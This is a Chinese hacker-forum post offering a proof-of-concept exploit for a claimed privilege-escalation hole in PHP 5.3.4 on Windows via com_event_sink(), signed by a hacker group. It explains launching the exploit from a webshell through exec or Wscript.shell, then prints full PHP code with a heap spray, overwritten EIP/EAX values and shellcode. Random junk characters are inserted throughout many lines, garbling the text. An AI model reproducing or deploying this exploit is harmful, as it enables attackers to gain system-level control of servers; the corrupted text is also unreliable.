|
|
PHP最新版已经更新至5.4.x,不过中国大陆尚处于在5.2.x和5.3.x更替的阶段。存在漏洞的php存在于5.3.x版本中6 k9 q Z. L8 T5 P+ {* l2 N
; \- _* }5 P& W' D测试方法如下:cmd /c x:\php\php.exe x:\test.php. {/ Y9 X6 ^' I* q. J
1 H9 Z# m( P8 {( j( a/ ?# V下载php程序至本地,然后使用php.exe解析php即可。Webshell上面使用php的exec等函数执行,或者使用Wscript.shell调用cmd.exe然后 /c x:\php\php.exe x:\xxxx\test.php% g+ Q z9 v* a
这里是两个测试的截图: z3 N( n* ]& p D% s$ z* J( u) X* B: F
4 M: }( Z7 P2 ]! e0 M
4 t9 \+ H. w& h0 y2 O, u5 l$ b e- ?: A5 ~
6 L8 {+ ?& ~, [8 m6 S: d% D$ w/ l0 _& T
成功利用此漏洞的攻击者将获得系统的最高权限
6 ^" Q+ E) @' B/ w- J' o
7 J5 r) Z/ M& ~" n* ?* |% y. z5 u) m2 L- W& b/ x4 e
8 f& k. r% ?* V" D6 S2 h$ ^
0 @7 M$ J" p. M" k3 i/ z% n
4 F0 s4 _) |: Y4 X( f$ c: f关于漏洞分析稍后附上。一下是PoC代码:
1 e8 x' q6 f5 @& h- ]& h8 m) s9 I. }# ]7 }
<?php/ q2 @# i) ]! d3 K
//PHP 5.3.4(Win版) com_event_sink()模型权限提升漏洞( R! `/ I; L- A7 y
//$eip ="\x44\x43\x42\x41";
/ H x* e8 ^9 }* {- g% ]$eip= "\x4b\xe8\x57\x78";6 ~, F) A! h' a( N) t! r) Z
$eax ="\x80\x01\x8d\x04";5 H9 M& ]- u" | F) K0 m
$deodrant="";: I8 e3 s+ V8 p6 N2 K+ d7 {* D& i0 W
$axespray = str_repeat($eip.$eax,0x80);
" x r4 F9 l+ e' H" a" B4 l, ~//048d0190. A( M- ^1 Q8 {( Q0 n2 s4 X* y
echo strlen($axespray);; f" g2 I( ~$ q1 ?5 a
echo "PHP 5.3.4(WIN) COM_SINK Privilege Escalation\n";2 {& k2 f' \3 c/ d
echo "Silic Group Hacker Army - BlackBap.Org";" M2 W0 W9 O- ]! M
//19200 ==4B32 4b002 l1 r9 A4 f5 R n
for($axeeffect=0;$axeeffect<0x4B32;$axeeffect++){$deodrant.=$axespray;}2 q0 r! F% A' X, e% r0 n
$terminate = "T";2 C, p# V/ z, H6 j; U' h
$u[] =$deodrant;
" Y7 S$ C4 Q" g$r[] =$deodrant.$terminate;
; f: F- C# j0 z) s2 t$a[] =$deodrant.$terminate;' ^/ S( C$ ^ x* ]% A3 {: Y/ z
$s[] =$deodrant.$terminate;5 W& y. P7 {: X6 i* _ m
//$vVar = new VARIANT(0x048d0038+$offset); 这里是可控可改的' V1 x i* n+ u/ n* I8 W
$vVar = new VARIANT(0x048d0000+180);
( _9 Y& J( A' W1 o: v//弹窗代码(Shellcode)8 S8 y2 Y8 e9 |% |; o' R
$buffer = "\x90\x90\x90"."\xB9\x38\xDD\x82\x7C\x33\xC0\xBB"."\xD8\x0A\x86\x7C\x51\x50\xFF\xd3";1 o) @3 O. \" j( ~7 \
$var2 = new VARIANT(0x41414242);
% D, [0 Y2 K! @8 F* b- B0 Qcom_event_sink($vVar,$var2,$buffer);
5 L9 y& o' ~, P! }* u8 [, H0 N?>
2 q% z4 I/ e+ ]# z& Z |
本帖子中包含更多资源
您需要 登录 才可以下载或查看,没有帐号?立即注册
x
|